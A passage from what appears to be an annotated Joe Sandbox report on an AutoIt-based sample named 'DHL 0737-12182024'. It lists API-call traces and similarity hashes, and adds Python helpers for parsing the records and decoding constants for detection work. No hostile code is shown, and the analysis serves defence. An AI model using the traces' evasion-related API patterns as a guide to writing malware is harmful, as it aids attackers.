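if __name__ == "__main__":
    for func, block in SAMPLE_BLOCKS.items():
        calls = parse_api_block(block)
        print(func, [c.api for c in calls], match_chains(calls))
```

Two caveats when using traces like these as detection input. First, the argument lists are the sandbox's stack-reconstruction heuristics, not ground truth: GetCurrentProcess takes no parameters, yet the block above shows 00000028 under it, a value equal to TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY (0x20 | 0x08) that belongs to a token-open call, so key rules on API order rather than argument positions. Second, the memory dump source for these functions is the main image at 0x820000, which for a compiled AutoIt binary is the interpreter stub whose code is the same for every script; a Sleep / GlobalMemoryStatusEx sequence there shows the capability exists, not that this script exercises it, so confirm against the decompiled script before treating the function as evasion.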
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008A57E0
                                                                                            • _wcslen.LIBCMT ref: 008A57EC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper_wcslen
                                                                                            • String ID: CALLARGARRAY
                                                                                            • API String ID: 157775604-1150593374
                                                                                            • Opcode ID: 452bcda55f35c64a608014b21daac2c3cc61c503370756601d2c66bb97ca7bca
                                                                                            • Instruction ID: e7e16f196a98526605538c4c34014f0a2a75b261540fe56a7ceb572a7e86cc5c
                                                                                            • Opcode Fuzzy Hash: 452bcda55f35c64a608014b21daac2c3cc61c503370756601d2c66bb97ca7bca
                                                                                            • Instruction Fuzzy Hash: 8C419031E002099FDB14DFA9C8819BEBBB5FF5A724F144069E505E7352EB349D81CBA1
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 0089D130
                                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0089D13A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CrackInternet_wcslen
                                                                                            • String ID: |
                                                                                            • API String ID: 596671847-2343686810
                                                                                            • Opcode ID: e4b7934a8a59ac8be74c978c60e607f8fdfbaca67285d8339a9730691b0e31ef
                                                                                            • Instruction ID: 225912ede53b100d9c2eb66e6c4afa991fc92aaaf28f0b336c1e1891b065367b
                                                                                            • Opcode Fuzzy Hash: e4b7934a8a59ac8be74c978c60e607f8fdfbaca67285d8339a9730691b0e31ef
                                                                                            • Instruction Fuzzy Hash: 1E313875D01219ABCF15EFA8DC85AEEBFB9FF04300F140019F815A6162EB31AA56CB65
                                                                                            APIs
                                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 008B3621
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 008B365C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$DestroyMove
                                                                                            • String ID: static
                                                                                            • API String ID: 2139405536-2160076837
                                                                                            • Opcode ID: 1c123c00fbc0327a871f1f124a19efc62fb6348cf05a9a9febbf6f9d0c6f7fc2
                                                                                            • Instruction ID: 222d63a2c02b08de2e1340759d309061d7db65e50889f5a86b3dac59c0cdc6dd
                                                                                            • Opcode Fuzzy Hash: 1c123c00fbc0327a871f1f124a19efc62fb6348cf05a9a9febbf6f9d0c6f7fc2
                                                                                            • Instruction Fuzzy Hash: AC319A71110608AEDB24DF38DC80EFB73A9FF99724F008619F8A5D7290DA30AD91DB60
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 008B461F
                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008B4634
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: '
                                                                                            • API String ID: 3850602802-1997036262
                                                                                            • Opcode ID: d51a50c21c4c2eefb9538732532845842311fdfd6e507265ee13baa1d5f4ff1a
                                                                                            • Instruction ID: 08bbe90ebafeb51fc40c31cd851e29c069d34ecd6db28b53167a0bb0f3b41d5a
                                                                                            • Opcode Fuzzy Hash: d51a50c21c4c2eefb9538732532845842311fdfd6e507265ee13baa1d5f4ff1a
                                                                                            • Instruction Fuzzy Hash: D6313874A0061A9FDF14CFA9C981BEABBB5FF19300F10516AE904EB352D770A941CF90
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008B327C
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008B3287
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: Combobox
                                                                                            • API String ID: 3850602802-2096851135
                                                                                            • Opcode ID: da317c9af60543a63dca742ce45b07b67eac989fc55bdc87ebb9c3cfcde88881
                                                                                            • Instruction ID: 2739738d3338af87d9e7cfd10cf9f50c47458bc2c090c6b68c36854586868bd2
                                                                                            • Opcode Fuzzy Hash: da317c9af60543a63dca742ce45b07b67eac989fc55bdc87ebb9c3cfcde88881
                                                                                            • Instruction Fuzzy Hash: 2B11B271300208BFEF219E98DC85EFB376AFB993A5F104228F918E7390D6719D518760
                                                                                            APIs
                                                                                              • Part of subcall function 0082600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0082604C
                                                                                              • Part of subcall function 0082600E: GetStockObject.GDI32(00000011), ref: 00826060
                                                                                              • Part of subcall function 0082600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0082606A
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 008B377A
                                                                                            • GetSysColor.USER32(00000012), ref: 008B3794
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                            • String ID: static
                                                                                            • API String ID: 1983116058-2160076837
                                                                                            • Opcode ID: 9df6982538b6602eca067a24adee983519a1c117bbee84a143fbbdb211e7200f
                                                                                            • Instruction ID: 9e06698028e1a1aeb7df9e767eab391d8321a7b756aefba69b7ce92122bc4edc
                                                                                            • Opcode Fuzzy Hash: 9df6982538b6602eca067a24adee983519a1c117bbee84a143fbbdb211e7200f
                                                                                            • Instruction Fuzzy Hash: BB1129B2610209AFDF00DFA8CC45EFA7BB8FB08354F004624F955E2250EB35E851DB60
                                                                                            APIs
                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0089CD7D
                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0089CDA6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Internet$OpenOption
                                                                                            • String ID: <local>
                                                                                            • API String ID: 942729171-4266983199
                                                                                            • Opcode ID: 6a5be7330560c7d50e9c3a1b50a602a2cb6fd329c16e66a263f0ae425148ee38
                                                                                            • Instruction ID: 407a114bbad1595c458ae3c4b76d511d91b2d66a2c02cbc2899940a48e82301b
                                                                                            • Opcode Fuzzy Hash: 6a5be7330560c7d50e9c3a1b50a602a2cb6fd329c16e66a263f0ae425148ee38
                                                                                            • Instruction Fuzzy Hash: 1F11C6B1205635BEDB345B668C45EE7BE6CFF127A8F144226B109C3180D7759840D6F0
                                                                                            APIs
                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 008B34AB
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008B34BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                            • String ID: edit
                                                                                            • API String ID: 2978978980-2167791130
                                                                                            • Opcode ID: a4a0e823911dc9f662692de1a68d9758f80e222ea87d9b8b8b078737cc456054
                                                                                            • Instruction ID: b5446d6e13f7988d80c94136ecd52e7efddf96df45fffa94f90cc9ea69f2e661
                                                                                            • Opcode Fuzzy Hash: a4a0e823911dc9f662692de1a68d9758f80e222ea87d9b8b8b078737cc456054
                                                                                            • Instruction Fuzzy Hash: 59118F71100108ABEB218E68DC44AFB3B6AFF25378F504324F961D32D0C771DD519758
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00886CB6
                                                                                            • _wcslen.LIBCMT ref: 00886CC2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                            • String ID: STOP
                                                                                            • API String ID: 1256254125-2411985666
                                                                                            • Opcode ID: 3c77fe85e0a617dfcee14caeffd3930fe4a06297008d0253e5c9d945c0ee5f0d
                                                                                            • Instruction ID: 0b7ba18655c75195485f27c7ddc4b91df8c5bbd25dce59af4b00115848e99a29
                                                                                            • Opcode Fuzzy Hash: 3c77fe85e0a617dfcee14caeffd3930fe4a06297008d0253e5c9d945c0ee5f0d
                                                                                            • Instruction Fuzzy Hash: 2F01C032A1052A8BCB21BFFDDC809BF77A6FF61714B110538E862D6191FA32D960C751
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00881D4C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            • Opcode ID: 5ec1940cb8852b8960f46bc2eee15736a55597580dd8b9bea1af2ad55b889638
                                                                                            • Instruction ID: 8b445cd513807c23668fa28becf9df820a6224268b700b22751d5e03fba47881
                                                                                            • Opcode Fuzzy Hash: 5ec1940cb8852b8960f46bc2eee15736a55597580dd8b9bea1af2ad55b889638
                                                                                            • Instruction Fuzzy Hash: 6D019E75601228AB8B08BBA8DD559FE73A8FB56360F040619F862E72C1EE30590987A1
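The function records above all follow one layout (an "APIs" list, an optional "Strings" list, the memory-dump provenance, and the "Similarity" identifiers), and the fields an analyst pivots on across reports are the API chain, the String ID and the Opcode ID. The parser below is an added example and is not part of the Joe Sandbox report or of the Joe Sandbox IDA plugin. It assumes only the record layout visible above; the three sample records are copied from this report, and the constant names in MSG_NAMES and INET_OPTIONS are taken from the Windows SDK headers (WM_SETFONT = 0x30, CB_ADDSTRING = 0x143, CB_SETCURSEL = 0x14E, EM_SETSEL = 0xB1, LB_ADDSTRING = 0x180, INTERNET_OPTION_CONNECTED_STATE = 50).

```python
"""Parse Joe Sandbox IDA-plugin function records into pivotable data.
Added example; not code from the report or from Joe Sandbox."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Three records copied from the report (layout indentation removed).
SAMPLE = """\
APIs
• _wcslen.LIBCMT ref: 0089D130
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0089D13A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• Opcode ID: e4b7934a8a59ac8be74c978c60e607f8fdfbaca67285d8339a9730691b0e31ef
• Instruction Fuzzy Hash: 1E313875D01219ABCF15EFA8DC85AEEBFB9FF04300F140019F815A6162EB31AA56CB65
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0089CD7D
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0089CDA6
Strings
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• Opcode ID: 6a5be7330560c7d50e9c3a1b50a602a2cb6fd329c16e66a263f0ae425148ee38
APIs
  • Part of subcall function 0082600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0082604C
  • Part of subcall function 0082600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0082606A
• GetWindowRect.USER32(00000000,?), ref: 008B377A
• GetSysColor.USER32(00000012), ref: 008B3794
Strings
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• Opcode ID: 9df6982538b6602eca067a24adee983519a1c117bbee84a143fbbdb211e7200f
"""

# "Name.MODULE(args), ref: ADDR", optionally prefixed by IDA's subcall marker.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$",
    re.IGNORECASE)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+): (?P<value>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constant names from the Windows SDK headers for argument slots seen in this report.
MSG_NAMES = {0x30: "WM_SETFONT", 0xB1: "EM_SETSEL", 0x143: "CB_ADDSTRING",
             0x14E: "CB_SETCURSEL", 0x180: "LB_ADDSTRING"}
INET_OPTIONS = {0x32: "INTERNET_OPTION_CONNECTED_STATE"}
DECODE_SLOT = {"SendMessageW": (1, MSG_NAMES), "InternetSetOptionW": (1, INET_OPTIONS)}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                          # call-site address in the dump
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # "API ID", "String ID", "Opcode ID", ...

    def api_chain(self, include_subcalls=False):
        """Call names in address order, e.g. '_wcslen->InternetCrackUrlW'."""
        calls = [c for c in self.apis if include_subcalls or c.subcall_of is None]
        return "->".join(c.name for c in sorted(calls, key=lambda c: c.ref))

def parse_records(text):
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop the bullet and layout whitespace
        if not line:
            continue
        if line == "APIs":                        # every record starts with its API list
            cur, section = FunctionRecord(), "APIs"
            records.append(cur)
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                    int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings":
            cur.strings.append(line)
        elif m := KV_RE.match(line):
            # "Download File" is the report page's download link, not part of the value
            cur.meta[m["key"]] = m["value"].removesuffix("Download File").strip()
    return records

def describe(call):
    """Render one call with the constant in its well-known argument slot decoded."""
    args = list(call.args)
    slot = DECODE_SLOT.get(call.name)
    if slot and len(args) > slot[0] and args[slot[0]] != "?":
        value = int(args[slot[0]], 16)
        args[slot[0]] = slot[1].get(value, hex(value))
    return f"{call.name}({','.join(args)}) @ {call.ref:08X}"

def index_by_api(records):
    """Map API name -> set of Opcode IDs, the field to pivot on across reports."""
    idx = {}
    for rec in records:
        for call in rec.apis:
            idx.setdefault(call.name, set()).add(rec.meta.get("Opcode ID"))
    return idx

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_chain(include_subcalls=True), rec.meta.get("String ID"))
        for call in rec.apis:
            print("   ", describe(call))
```

Two things the decoded output makes visible that the raw records do not: the 0x32 option set with an 8-byte buffer right after InternetOpenW is INTERNET_OPTION_CONNECTED_STATE with an INTERNET_CONNECTED_INFO structure (two DWORDs), i.e. the WinINet handle is being forced into the connected state, and the "Part of subcall" lines belong to a callee shared by several records (0082600E here), so they should be excluded from a record's own API chain when that chain is used as a signature.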
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00881C46
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00881CC8
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00881DD3
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 624084870-1403004172
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: _wcslen
                                                                                            • String ID: 3, 3, 16, 1
                                                                                            • API String ID: 176396367-3042988571
                                                                                            APIs
                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00880B23
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                            • API String ID: 2030045667-4017498283
                                                                                            APIs
                                                                                              • Part of subcall function 0083F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00840D71,?,?,?,0082100A), ref: 0083F7CE
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0082100A), ref: 00840D75
                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0082100A), ref: 00840D84
                                                                                            Strings
                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00840D7F
                                                                                            Similarity
                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                            • API String ID: 55579361-631824599
                                                                                            APIs
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: %.3d$X64
                                                                                            • API String ID: 481472006-1077770165
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008B232C
                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008B233F
                                                                                              • Part of subcall function 0088E97B: Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461
                                                                                            APIs
                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008B236C
                                                                                            • PostMessageW.USER32(00000000), ref: 008B2373
                                                                                              • Part of subcall function 0088E97B: Sleep.KERNEL32 ref: 0088E9F3
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                            • String ID: Shell_TrayWnd
                                                                                            • API String ID: 529655941-2988720461
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0085BE93
                                                                                            • GetLastError.KERNEL32 ref: 0085BEA1
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085BEFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
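The dump-source names listed above encode where each dumped region sat in the process and how it was mapped, which is what lets an analyst confirm the report's "based on PE: true" claim rather than take it on faith. The helper below is an added example written for this page; it is not Joe Sandbox code, and the dotted field layout it assumes for the `.sdmp` names (process, state, dump id, base address, protection, two undocumented fields around a memory-type field) is an assumption made here, not a documented format. What is not assumed are the Win32 constants it decodes against (`PAGE_*` and `MEM_*` from winnt.h); the fact that 0x20 lands on the code section at 0x821000, 0x02 on the header and read-only sections, 0x04 on the writable section at 0x8EC000, and 0x01000000 (`MEM_IMAGE`) on every region is what makes the layout reading plausible for this report. The names in `REPORT_SOURCES` are copied from the listing; the RWX private region in the test is constructed.

```python
"""
Added analyst helper (not part of the Joe Sandbox report): decode the
"Memory Dump Source" names and sanity-check them against the PE layout
the report claims (image base 0x820000, regions mapped from the file).

ASSUMED field layout of the dotted .sdmp name (an assumption made for
this example, not a documented Joe Sandbox format):
  <proc>.<state>.<dump-id>.<base-address>.<protect>.<f6>.<type>.<f8>.sdmp
Only the base address, the protection field and the memory-type field
are interpreted; everything else is carried through as a raw integer.
"""
import re
from dataclasses import dataclass

# Win32 page-protection constants (winnt.h); these values are not assumptions.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
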